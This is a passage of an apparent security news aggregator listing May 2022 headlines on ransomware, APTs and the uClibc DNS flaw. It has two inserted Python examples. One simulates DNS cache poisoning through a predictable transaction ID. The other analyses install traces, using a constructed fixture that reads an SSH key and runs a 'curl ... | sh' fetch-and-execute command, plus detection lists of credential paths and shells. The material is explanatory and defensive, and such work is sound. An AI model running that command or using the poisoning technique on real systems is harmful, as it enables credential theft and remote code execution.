The Series C funding round was led by Bessemer Venture Partners, with participation from Insight Partners and existing investors. This latest investment brings the total raised to $169.2 million and values the firm at $1.1 billion.Security Week
May 04, 2022 – Education
Using PowerShell to manage password resets in Windows domains Full Text
Abstract
With breaches running rampant, it's common to force password resets on your Windows domain. This article shows how admins can use PowerShell to manage password resets and introduce software that makes it even easier.BleepingComputer
May 4, 2022 – Vulnerabilities
Vulnerabilities Allow Hijacking of Most Ransomware to Prevent File Encryption Full Text
Abstract
A researcher has shown how a type of vulnerability affecting many ransomware families can be exploited to control the malware and terminate it before it can encrypt files on compromised systems.Security Week
May 04, 2022 – Attack
Pro-Ukraine hackers use Docker images to DDoS Russian sites Full Text
Abstract
Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by government, military, and news organizations.BleepingComputer
May 3, 2022 – Privacy
Mozilla: Lack of Security Protections in Mental-Health Apps Is ‘Creepy’ Full Text
Abstract
Popular apps to support people’s psychological and spiritual well-being can harm them by sharing their personal and sensitive data with third parties, among other privacy offenses.Threatpost
May 03, 2022 – Ransomware
New ransomware strains linked to North Korean govt hackers Full Text
Abstract
Several ransomware strains have been linked to APT38, a North Korean-sponsored hacking group known for its focus on targeting and stealing funds from financial institutions worldwide.BleepingComputer
May 3, 2022 – Hacker
Lapsus$ Eyes SharePoint, VPNs, and VMs Full Text
Abstract
A new report revealed the techniques and tactics of the highly unpredictable attacks by the Lapsus$ gang to target the victims, along with its interest in exploiting SharePoint, VPNs, and VMs. Researchers have observed mass deletion of VMs, storage, and configurations in cloud environments. For rem ...Cyware Alerts - Hacker News
May 03, 2022 – Vulnerabilities
Critical TLStorm 2.0 Bugs Affect Widely-Used Aruba and Avaya Network Switches Full Text
Abstract
Cybersecurity researchers have detailed as many as five severe security flaws in the implementation of the TLS protocol in several models of Aruba and Avaya network switches that could be abused to gain remote access to enterprise networks and steal valuable information. The findings follow the March disclosure of TLStorm, a set of three critical flaws in APC Smart-UPS devices that could permit an attacker to take over control and, worse, physically damage the appliances. IoT security firm Armis, which uncovered the shortcomings, noted that the design flaws can be traced back to a common source: a misuse of NanoSSL, a standards-based SSL developer suite from Mocana, a DigiCert subsidiary. The new set of flaws, dubbed TLStorm 2.0, exposes Aruba and Avaya network switches to remote code execution, enabling an adversary to commandeer the devices, move laterally across the network, and exfiltrate sensitive data. Affected devices include Avaya ERS3500 SeriThe Hacker News
May 3, 2022 – General
What Does the 2022 NDS Fact Sheet Imply for the Forthcoming Cyber Strategy? Full Text
Abstract
The NDS fact sheet makes clear that campaigning is important for achieving security across the full spectrum of strategic competition and supporting integrated deterrence.Lawfare
May 3, 2022 – APT
China-linked APT Curious Gorge targeted Russian govt agencies Full Text
Abstract
China-linked Curious Gorge APT is targeting Russian government agencies, Google Threat Analysis Group (TAG) warns. TAG reported that an APT group linked to China's People's Liberation Army Strategic Support Force (PLA...Security Affairs
May 03, 2022 – Malware
Conti, REvil, LockBit ransomware bugs exploited to block encryption Full Text
Abstract
Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the tables by finding exploits in the most common ransomware and malware being distributed today.BleepingComputer
May 3, 2022 – Criminals
REvil Ransomware Gang is Back in the Game Full Text
Abstract
Weeks after reporting renewed activity on its Tor sites, researchers claim the return of the REvil group with new infrastructure and an updated malware sample with a modified encryptor for more targeted attacks. It is recommended to keep security shields charged up to fend off such threats. Meanwhile, the publi ...Cyware Alerts - Hacker News
May 03, 2022 – Criminals
Experts Analyze Conti and Hive Ransomware Gangs’ Chats With Their Victims Full Text
Abstract
An analysis of four months of chat logs spanning more than 40 conversations between the operators of Conti and Hive ransomware and their victims has offered an insight into the groups' inner workings and their negotiation techniques. In one exchange, the Conti Team is said to have significantly reduced the ransom demand from a staggering $50 million to $1 million, a 98% drop, suggesting a willingness to settle for a far lower amount. "Both Conti and Hive are quick to lower ransom demands, routinely offering substantial reductions multiple times throughout negotiations," Cisco Talos said in a report shared with The Hacker News. "This signals that despite popular belief, victims of a ransomware attack actually have significant negotiating power." Conti and Hive are among the most prevalent ransomware strains in the threat landscape, cumulatively accounting for 29.1% of attacks detected during the three-month period between October and December 2021. AThe Hacker News
May 3, 2022 – Vulnerabilities
A DNS flaw impacts a library used by millions of IoT devices Full Text
Abstract
A vulnerability in the domain name system (DNS) component of the uClibc library impacts millions of IoT products. Nozomi Networks warns of a vulnerability (labelled "CVE-2022-05-02" in the original report, which is not a valid CVE identifier form) in the domain name system (DNS) component of the uClibc...Security Affairs
May 03, 2022 – Phishing
New phishing warns: Your verified Twitter account may be at risk Full Text
Abstract
Phishing campaigns increasingly target the owners of verified Twitter accounts with emails designed to steal their account credentials, as shown by numerous ongoing campaigns conducted by threat actors.BleepingComputer
May 3, 2022 – Hacker
TA410 Group has Got New Tools and Three Teams Working Under it Full Text
Abstract
Analysts revealed that the threat group TA410 comprises three independent subgroups that have been operating globally since 2018 to collect intelligence via phishing campaigns. TA410 shares behavioral and tooling overlaps with APT10 and has a history of targeting U.S.-based organizations. Organizat ...Cyware Alerts - Hacker News
May 3, 2022 – APT
China-linked Moshen Dragon abuses security software to sideload malware Full Text
Abstract
A China-linked APT group, tracked as Moshen Dragon, is exploiting antivirus products to target the telecom sector in Asia. A China-linked APT group, tracked as Moshen Dragon, has been observed targeting the telecommunication sector in Central Asia...Security Affairs
May 03, 2022 – Cryptocurrency
SEC ramps up fight on cryptocurrency fraud by doubling cyber unit Full Text
Abstract
The US Securities and Exchange Commission (SEC) announced today that it will almost double the Crypto Assets and Cyber Unit to ramp up the fight against cryptocurrency fraud to protect investors from "cyber-related threats."BleepingComputer
May 3, 2022 – Ransomware
Black Basta and Onyx Leading the New Waves of Ransomware Attacks Full Text
Abstract
Two new ransomware strains have been doing the rounds. The first, tracked as Black Basta, has infiltrated at least a dozen companies in a matter of weeks. Another one, dubbed Onyx, has also managed to hit six organizations. The latter destroys large files instead of locking them, hence preventing d ...Cyware Alerts - Hacker News
May 03, 2022 – Government
Google: Chinese state hackers keep targeting Russian govt agencies Full Text
Abstract
Google said today that a Chinese-sponsored hacking group linked to China's People's Liberation Army Strategic Support Force (PLA SSF) is targeting Russian government agencies.BleepingComputer
May 3, 2022
Data Breach at US Energy Supplier Riviera Utilities Potentially Exposed Sensitive Customer Information Full Text
Abstract
A data breach at Riviera Utilities, a utility company serving Baldwin County in Alabama, exposed the personal details of customers after employee email accounts were accessed.The Daily Swig
May 03, 2022 – Vulnerabilities
Unpatched DNS bug affects millions of routers and IoT devices Full Text
Abstract
A vulnerability in the domain name system (DNS) component of a popular C standard library that is present in a wide range of IoT products may put millions of devices at DNS poisoning attack risk.BleepingComputer
May 3, 2022 – Vulnerabilities
TLStorm 2.0: Critical bugs in widely-used Aruba, Avaya network switches Full Text
Abstract
The new TLStorm 2.0 research exposes vulnerabilities that could allow an attacker to take full control over network switches used in airports, hospitals, hotels, and other organizations worldwide.Help Net Security
May 03, 2022 – Vulnerabilities
Aruba and Avaya network switches are vulnerable to RCE attacks Full Text
Abstract
Security researchers have discovered five vulnerabilities in network equipment from Aruba (owned by HPE) and Avaya (whose networking business is now owned by Extreme Networks) that could allow malicious actors to execute code remotely on the devices.BleepingComputer
May 3, 2022 – Vulnerabilities
Researchers Reveal Unpatched Vulnerability in C Library That Could Enable DNS Poisoning Attacks Full Text
Abstract
The vulnerability is in a library for the C programming language — uClibc / uClibc-ng — that is commonly used in creating software for IoT products, reported researchers at Nozomi Networks.The Record
May 3, 2022 – Vulnerabilities
Two vulnerabilities in Accusoft ImageGear could lead to DoS, arbitrary free Full Text
Abstract
The ImageGear library is a document-imaging developer toolkit that allows users to create, edit, annotate and convert various images. It supports more than 100 file formats such as DICOM, PDF and Microsoft Office.Cisco Talos
May 3, 2022 – APT
UNC3524 APT uses IP cameras to deploy backdoors and target Exchange Full Text
Abstract
A new APT group, tracked as UNC3524, uses IP cameras to deploy backdoors and steal Microsoft Exchange emails. Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees that focus on corporate...Security Affairs
May 3, 2022 – Solution
Package Analysis dynamically analyzes packages in open-source repositories Full Text
Abstract
The Open Source Security Foundation (OpenSSF) is working on a tool to conduct a dynamic analysis of packages uploaded to popular open-source repositories. The Open Source Security Foundation (OpenSSF) announced the release of the first version of a new tool,...Security Affairs
May 02, 2022 – Ransomware
AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection Full Text
Abstract
Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. "This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys)," Trend Micro researchers Christopher Ordonez and Alvin Nieto said in a Monday analysis. "In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap NSE script." AvosLocker, one of the newer ransomware families to fill the vacuum left by REvil, has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities. A ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortionThe Hacker News
May 02, 2022 – Criminals
Chinese Hackers Caught Exploiting Popular Antivirus Products to Target Telecom Sector Full Text
Abstract
A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX. Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka RedFoxtrot). "PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity," SentinelOne's Joey Chen said. "Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products." ShadowPad, labeled a "masterpiece of privately sold malware in Chinese espionage," emerged as a successor to PlugX in 2015, even as variants of the latter have continually popped up as part of different campaigns associated with Chinese threat actors. AlthThe Hacker News
May 02, 2022 – Vulnerabilities
Unpatched DNS Related Vulnerability Affects a Wide Range of IoT Devices Full Text
Abstract
Cybersecurity researchers have disclosed an unpatched security vulnerability that could pose a serious risk to IoT products. The issue, which was originally reported in September 2021, affects the Domain Name System (DNS) implementation of two popular C libraries called uClibc and uClibc-ng that are used for developing embedded Linux systems. uClibc is known to be used by major vendors such as Linksys, Netgear, and Axis, as well as Linux distributions like Embedded Gentoo, potentially exposing millions of IoT devices to security threats. "The flaw is caused by the predictability of transaction IDs included in the DNS requests generated by the library, which may allow attackers to perform DNS poisoning attacks against the target device," Giannis Tsaraias and Andrea Palanca of Nozomi Networks said in a Monday write-up. DNS poisoning, also referred to as DNS spoofing, is the technique of corrupting a DNS resolver cache — which provides clients with the IP address aThe Hacker News
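The transaction-ID problem Nozomi describes, worked as an added Python example that is not from Nozomi's write-up or from uClibc's source (it also serves the other entries on this flaw above). A toy stub resolver builds genuine DNS wire-format queries and, as RFC 5452 requires, accepts a reply only when its TXID and destination port match an outstanding query. The vulnerable configuration pairs a TXID counter that increments by one per query (a simplification standing in for the predictable generator, not uClibc's implementation) with a fixed source port, so an off-path attacker who has seen one ID can forge the next answer in a single try; the hardened configuration draws both values from a CSPRNG. Names, addresses and port numbers are constructed.

```python
import secrets
import struct
from typing import Callable, Dict, Tuple


def encode_name(name: str) -> bytes:
    """RFC 1035 wire form: length-prefixed labels followed by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def build_query(txid: int, name: str) -> bytes:
    """Minimal recursive A query: 12-byte header (RD=1, QDCOUNT=1) + one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def build_response(txid: int, name: str, ip: str) -> bytes:
    """Response with one A record (QR=1, RD=1, RA=1, ANCOUNT=1); the answer's
    owner name is a compression pointer to the question at offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, len(rdata)) + rdata
    return header + question + answer


def parse_a_answer(pkt: bytes) -> Tuple[int, str]:
    """Return (txid, ip) from a response shaped like build_response's output."""
    txid = struct.unpack("!H", pkt[:2])[0]
    return txid, ".".join(str(b) for b in pkt[-4:])


class StubResolver:
    """Client side of a lookup: an answer is accepted only if it arrives on the
    port the query left from and carries the same TXID (RFC 5452 matching)."""

    def __init__(self, next_txid: Callable[[], int], next_port: Callable[[], int]):
        self.next_txid, self.next_port = next_txid, next_port
        self.pending: Dict[Tuple[int, int], str] = {}  # (source port, txid) -> name
        self.cache: Dict[str, str] = {}

    def send(self, name: str) -> Tuple[int, bytes]:
        port, txid = self.next_port(), self.next_txid()
        self.pending[(port, txid)] = name
        return port, build_query(txid, name)

    def receive(self, port: int, pkt: bytes) -> bool:
        txid, ip = parse_a_answer(pkt)
        name = self.pending.pop((port, txid), None)
        if name is None:
            return False  # no matching outstanding query: silently dropped
        self.cache[name] = ip  # first matching answer wins; the genuine one arriving later is ignored
        return True


def counter_txid(start: int) -> Callable[[], int]:
    """Vulnerable generator: the TXID increases by one per query, so whoever sees
    one ID knows the next. Simplified stand-in for the predictable generator the
    write-up describes, not uClibc's implementation (assumption of this example)."""
    state = {"n": start}

    def nxt() -> int:
        state["n"] = (state["n"] + 1) & 0xFFFF
        return state["n"]

    return nxt


def random_txid() -> int:
    return secrets.randbits(16)


def random_port() -> int:
    return 1024 + secrets.randbelow(65536 - 1024)


def leak_txid(resolver: StubResolver) -> Tuple[int, int]:
    """Attacker makes the device resolve a name it controls and reads back the
    (source port, TXID) used; with a counter that reveals the next ID."""
    port, query = resolver.send("probe.attacker.example")  # constructed name
    return port, struct.unpack("!H", query[:2])[0]


def off_path_poison(resolver: StubResolver, observed_txid: int, port_guess: int,
                    victim: str = "update.vendor.example", rogue_ip: str = "203.0.113.66") -> bool:
    """Race a single forged answer for the device's next lookup of `victim`."""
    resolver.send(victim)  # the real reply is still in flight
    forged = build_response((observed_txid + 1) & 0xFFFF, victim, rogue_ip)
    return resolver.receive(port_guess, forged)


def run_scenarios() -> Dict[str, bool]:
    """Whether one forged reply poisons the cache in each configuration."""
    results = {}
    vulnerable = StubResolver(counter_txid(start=0x1000), lambda: 4096)  # fixed source port
    port, txid = leak_txid(vulnerable)
    results["counter_txid_fixed_port"] = off_path_poison(vulnerable, txid, port)

    hardened = StubResolver(random_txid, random_port)
    port, txid = leak_txid(hardened)  # leaked values say nothing about the next query
    results["random_txid_random_port"] = off_path_poison(hardened, txid, port)
    return results


if __name__ == "__main__":
    for scenario, poisoned in run_scenarios().items():
        print(f"{scenario}: forged answer accepted = {poisoned}")
```

Run directly to print both outcomes. The hardened case still succeeds with probability of roughly 1 in 2^16 times 64512 per forged packet, which is why source-port randomization matters as much as the TXID fix when the library cannot be patched: a fixed or predictable source port collapses the search back to the 16-bit TXID, and with a counter that space shrinks to a single guess.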
May 02, 2022 – Hacker
New Hacker Group Pursuing Corporate Employees Focused on Mergers and Acquisitions Full Text
Abstract
A newly discovered suspected espionage threat actor has been targeting employees focusing on mergers and acquisitions as well as large corporate transactions to facilitate bulk email collection from victim environments. Mandiant is tracking the activity cluster under the uncategorized moniker UNC3524, citing a lack of evidence linking it to an existing group. However, some of the intrusions are said to mirror techniques used by different Russia-based hacking crews like APT28 and APT29. "The high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet set this group apart and emphasize the 'advanced' in Advanced Persistent Threat," the threat intelligence firm said in a Monday report. The initial access route is unknown but upon gaining a foothold, attack chains involving UNC3524 culminate in the deployment of a novel backdoor called QUIETEXIT for persistent remote access for as long asThe Hacker News
May 02, 2022 – Attack
GitHub Says Recent Attack Involving Stolen OAuth Tokens Was “Highly Targeted” Full Text
Abstract
Cloud-based code hosting platform GitHub described the recent attack campaign involving the abuse of OAuth access tokens issued to Heroku and Travis-CI as "highly targeted" in nature. "This pattern of behavior suggests the attacker was only listing organizations in order to identify accounts to selectively target for listing and downloading private repositories," GitHub's Mike Hanley said in an updated post. The security incident, which it discovered on April 12, related to an unidentified attacker leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM. The Microsoft-owned company said last week that it's in the process of sending a final set of notifications to GitHub customers who had either the Heroku or Travis CI OAuth app integrations authorized in their accounts. According to a detailed step-by-step analysis carried out by GitHub, thThe Hacker News
May 02, 2022 – Attack
Chinese cyber-espionage group Moshen Dragon targets Asian telcos Full Text
Abstract
Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia.BleepingComputer
May 2, 2022 – Attack
Rocket Kitten Targets VMware Flaws In the Wild Full Text
Abstract
Iran-linked Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Users of the associated VMware products should review their VMware architecture to make sure the ...Cyware Alerts - Hacker News
May 02, 2022 – Hacker
Chinese “Override Panda” Hackers Resurface With New Espionage Attacks Full Text
Abstract
A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country." Override Panda, also called Naikon, Hellsing, and Bronze Geneva, has operated on behalf of Chinese interests since at least 2005, conducting intelligence-gathering operations targeting ASEAN countries. Attack chains unleashed by the threat actor have involved the use of decoy documents attached to spear-phishing emails that are designed to entice the intended victims to open and compromise themselves with malwareThe Hacker News
May 2, 2022 – Education
How Can One Know When To Trust Hardware and Software? Full Text
Abstract
The Lawfare Institute convened a working group of experts to answer that question. The group's report, titled "Creating a Framework for Supply Chain Trust in Hardware and Software" is available now.Lawfare
May 2, 2022 – Outage
Car rental company Sixt hit by a cyberattack that caused temporary disruptions Full Text
Abstract
The car rental company Sixt announced it was hit by a cyberattack that is causing temporary business disruptions at customer care centers and select branches. The car rental company Sixt detected IT anomalies on April 29th, 2022 and immediately...Security Affairs
May 02, 2022 – Solution
Microsoft Defender for Business stand-alone now generally available Full Text
Abstract
Microsoft says that its enterprise-grade endpoint security for small to medium-sized businesses is now generally available.BleepingComputer
May 2, 2022 – Attack
Amazon Web Services Targeted by a Package Backfill Attack Full Text
Abstract
WhiteSource identified, blocked, and reported two packages that were deemed to be malicious versions of original AWS packages. WhiteSource security experts have reached out to contacts at Amazon to notify them of their findings.White Source Software
May 02, 2022 – Vulnerabilities
Which Hole to Plug First? Solving Chronic Vulnerability Patching Overload Full Text
Abstract
According to folklore, witches were able to sail in a sieve, a strainer with holes in the bottom. Unfortunately, witches don't work in cybersecurity – where networks generally have so many vulnerabilities that they resemble sieves. For most of us, keeping the sieve of our networks afloat requires nightmarishly hard work and frequent compromises on which holes to plug first. The reason? In 2010, just under 5000 CVEs were recorded in the MITRE vulnerabilities database. By 2021, the yearly total had skyrocketed to over 20,000. Today, software and network integrity are synonymous with business continuity. And this makes the issue of which vulnerabilities to address first mission-critical. Yet owing to the countless documented vulnerabilities lurking in a typical enterprise ecosystem – across thousands of laptops, servers, and internet-connected devices – less than one in ten actually needs to be patched. The question is: how can we know which patches will ensure that our sieve doesThe Hacker News
May 2, 2022 – Criminals
The mystery behind the samples of the new REvil ransomware operation Full Text
Abstract
The REvil ransomware gang has resumed its operations, experts found a new encryptor and a new attack infrastructure. The REvil ransomware operation shut down in October 2021, in January the Russian Federal Security Service (FSB) announced...Security Affairs
May 02, 2022 – Phishing
Google SMTP relay service abused for sending phishing emails Full Text
Abstract
Phishing actors abuse Google's SMTP relay service to bypass email security products and successfully deliver malicious emails to targeted users.BleepingComputer
May 2, 2022 – Breach
Attackers Steal $80 Million From Rari Capital’s Fuse Platform, Fei Protocol Suffers From Exploit Full Text
Abstract
The attack on Saturday was also confirmed by Fei Protocol’s official Twitter account. Fei Protocol also offered the attacker a $10 million bounty to return the stolen funds.Bitcoin
May 02, 2022 – Attack
Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia Full Text
Abstract
A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with a subset of the crew's activity assigned the moniker Nobelium (aka UNC2452/2652). "This latest wave of spear phishing showcases APT29's enduring interests in obtaining diplomatic and foreign policy information from governments around the world," Mandiant said in a report published last week. The initial access is said to have been aided through spear-phishing emails masquerading as administrative notices, using legitimate but compromised email addresses from other diplomatic entities. These emails contain an HTML dropper attachment called ROOTSAW (aka EnvyScout) that, when opened, triggers an infection sequence that delivers and execThe Hacker News
May 2, 2022 – Criminals
Group-IB CEO remains in prison – the Russian-led company has been ‘blacklisted’ in Italy Full Text
Abstract
The latest executive order from the Italian ACN agency banned Group-IB, a Russian-led cybersecurity firm, from working in the government sector. The latest executive order from the Italian National Cybersecurity Agency (NCA) banned Group-IB, a Russian-led...Security Affairs
May 02, 2022 – Hacker
Cyberspies use IP cameras to deploy backdoors, steal Exchange emails Full Text
Abstract
A newly discovered and uncommonly stealthy Advanced Persistent Threat (APT) group is breaching corporate networks to steal Exchange (on-premise and online) emails from employees involved in corporate transactions such as mergers and acquisitions.BleepingComputer
May 2, 2022 – Ransomware
New Black Basta Ransomware Possibly Linked to Conti Group Full Text
Abstract
A new ransomware operation named Black Basta has targeted at least a dozen companies and some researchers believe there may be a connection to the notorious Conti ransomware group.Security Week
May 2, 2022 – General
IoT and Cybersecurity: What’s the Future? Full Text
Abstract
IoT gizmos make our lives easier, but we forget that these doohickeys are IP endpoints that act as mini-radios. They continuously send and receive data via the internet and can be the easiest way for a hacker to access your home network. IoT devices...Security Affairs
May 02, 2022 – Attack
Car rental giant Sixt facing disruptions due to a cyberattack Full Text
Abstract
Car rental giant Sixt was hit by a weekend cyberattack causing business disruptions at customer care centers and select branches.BleepingComputer
May 2, 2022 – Business
Smallstep Raises $26 Million for Automated Certificate Management Platform Full Text
Abstract
Smallstep says it will use the funds to invest in the open-source community, will continue to build products for practical zero trust, and will accelerate research and development.Security Week
May 2, 2022 – APT
Russia-linked APT29 targets diplomatic and government organizations Full Text
Abstract
Russia-linked APT29 (Cozy Bear or Nobelium) launched a spear-phishing campaign targeting diplomats and government entities. In mid-January 2022, security researchers from Mandiant spotted a spear-phishing campaign, launched by the Russia-linked...Security Affairs
May 02, 2022 – Breach
U.S. DoD tricked into paying $23.5 million to phishing actor Full Text
Abstract
The U.S. Department of Justice (DoJ) has announced the conviction of Sercan Oyuntur, 40, resident of California, for multiple counts relating to a phishing operation that caused $23.5 million in damages to the U.S. Department of Defense (DoD).BleepingComputer
May 2, 2022 – Malware
Analysis on recent wiper attacks: examples and how wiper malware works Full Text
Abstract
In the last two months, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time.AT&T Cybersecurity
May 2, 2022 – Ransomware
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell Full Text
Abstract
While previous AvosLocker infections employ similar routines, this is the first sample researchers observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys).Trend Micro
May 01, 2022 – Privacy
Google Releases First Developer Preview of Privacy Sandbox on Android 13 Full Text
Abstract
Google has officially released the first developer preview for the Privacy Sandbox on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online. "The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview. A "multi-year effort," Privacy Sandbox on Android aims to create technologies that are privacy-preserving while keeping online content and services free, without resorting to opaque methods of digital advertising. The idea is to limit sharing of user data with third parties and operate without cross-app identifiers, including advertising ID, a unique, user-resettable string of letters and digits that can be used to track users as they move between apps. Google originally announced its plans to bring Privacy Sandbox to Android earlier this February, followingThe Hacker News
May 01, 2022 – Solution
Here’s a New Tool That Scans Open-Source Repositories for Malicious Packages Full Text
Abstract
The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories. Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software. "The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?" the OpenSSF said. "The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously," the foundation's Caleb Brown and David A. Wheeler added. In a test run that lasted a month, the tool ideThe Hacker News
May 01, 2022 – General
A YouTuber is encouraging you to DDoS Russia—how risky is this? Full Text
Abstract
A YouTube influencer with hundreds of thousands of subscribers is encouraging everyone to conduct cyber warfare against Russia. How risky is it and can you get in trouble?BleepingComputer
May 01, 2022 – Criminals
REvil ransomware returns: New malware sample confirms gang is back Full Text
Abstract
The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.BleepingComputer
May 1, 2022 – General
Hacking Russia was off-limits, but the Ukraine war made it a free-for-all Full Text
Abstract
For more than a decade, U.S. cybersecurity experts have warned about Russian hacking that increasingly uses the labor power of financially motivated criminal gangs to achieve political goals, such as strategically leaking campaign emails.Stars and Stripes
May 1, 2022 – Vulnerabilities
Synology and QNAP warn of critical Netatalk flaws in some of their products Full Text
Abstract
Synology warns customers that some of its NAS devices are affected by multiple critical Netatalk vulnerabilities. Synology has warned customers that multiple critical Netatalk vulnerabilities affect some of its network-attached storage (NAS) devices....Security Affairs
May 01, 2022 – Malware
Open source ‘Package Analysis’ tool finds malicious npm, PyPI packages Full Text
Abstract
The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative, has released its first prototype version of the 'Package Analysis' tool that aims to catch and counter malicious attacks on open source registries. The open source tool released on GitHub was able to identify over 200 malicious npm and PyPI packages.BleepingComputer
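What a behaviour report of that kind looks like, as an added Python example that is not the OpenSSF tool's code (it illustrates both Package Analysis entries on this page): it reduces strace-style traces of a package's install step to the three questions the foundation poses (files accessed, addresses contacted, commands run), diffs two versions to show the "changes over time" check, and flags the patterns a reviewer would act on. The traces, the package name exampkg, the paths and the 203.0.113.10 address are constructed for the example.

```python
import re
from typing import Dict, List, Set

# Constructed strace-style traces of an invented package's install step, one
# version apart. Not output of the OpenSSF Package Analysis tool.
TRACE_V1_0 = """\
openat(AT_FDCWD, "/tmp/build/exampkg-1.0/setup.py", O_RDONLY) = 3
openat(AT_FDCWD, "/usr/lib/python3/dist-packages/setuptools/__init__.py", O_RDONLY) = 4
execve("/usr/bin/python3", ["python3", "setup.py", "install"], 0x7ffd2f80 /* 20 vars */) = 0
"""
TRACE_V1_1 = TRACE_V1_0 + """\
openat(AT_FDCWD, "/home/build/.ssh/id_rsa", O_RDONLY) = 5
connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("203.0.113.10")}, 16) = 0
execve("/bin/sh", ["sh", "-c", "curl -s https://203.0.113.10/x | sh"], 0x7ffd2f80 /* 20 vars */) = 0
"""

# Parsers for the three syscalls that answer the three questions.
OPEN_RE = re.compile(r'^openat\(\w+, "([^"]+)"')
CONNECT_RE = re.compile(
    r'^connect\(\d+, \{sa_family=AF_INET, sin_port=htons\((\d+)\), sin_addr=inet_addr\("([^"]+)"\)')
EXEC_RE = re.compile(r'^execve\("[^"]+", \[([^\]]*)\]')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted argv entries, with escaped quotes allowed

Report = Dict[str, Set[str]]


def summarize(trace: str) -> Report:
    """Which files were opened, which addresses were contacted, which commands ran."""
    report: Report = {"files": set(), "addresses": set(), "commands": set()}
    for line in trace.splitlines():
        if m := OPEN_RE.match(line):
            report["files"].add(m.group(1))
        elif m := CONNECT_RE.match(line):
            report["addresses"].add(f"{m.group(2)}:{m.group(1)}")
        elif m := EXEC_RE.match(line):
            report["commands"].add(" ".join(ARG_RE.findall(m.group(1))))
    return report


def new_behaviour(before: Report, after: Report) -> Report:
    """Behaviour present in the new version but absent from the previous one:
    the 'previously safe software begins acting suspiciously' check."""
    return {key: after[key] - before[key] for key in after}


# Heuristics for this example; a real deployment would tune these per ecosystem.
CREDENTIAL_MARKERS = ("/.ssh/", "/.aws/", "/.npmrc", "/.pypirc", "/.netrc", "/.git-credentials")
SHELLS = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell"}


def flag(report: Report) -> List[str]:
    """Patterns worth a human look when they occur at install time."""
    findings: List[str] = []
    for path in sorted(report["files"]):
        if any(marker in path for marker in CREDENTIAL_MARKERS):
            findings.append(f"reads credential material: {path}")
    for addr in sorted(report["addresses"]):
        findings.append(f"contacts the network during install: {addr}")
    for cmd in sorted(report["commands"]):
        if cmd.split(" ", 1)[0] in SHELLS:
            findings.append(f"spawns a shell: {cmd}")
    return findings


if __name__ == "__main__":
    old, new = summarize(TRACE_V1_0), summarize(TRACE_V1_1)
    for category, items in new_behaviour(old, new).items():
        print(f"new in 1.1 - {category}: {sorted(items)}")
    for finding in flag(new):
        print("FLAG:", finding)
```

A network connection during install is not proof of malice on its own (build-time dependency downloads look the same), which is why the version diff matters: behaviour that is new in 1.1 relative to 1.0 is what warrants a look, and the combination of a credential-file read, an outbound connection and a shell spawn in the constructed 1.1 trace is the shape a real finding takes.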
May 1, 2022 – Breach
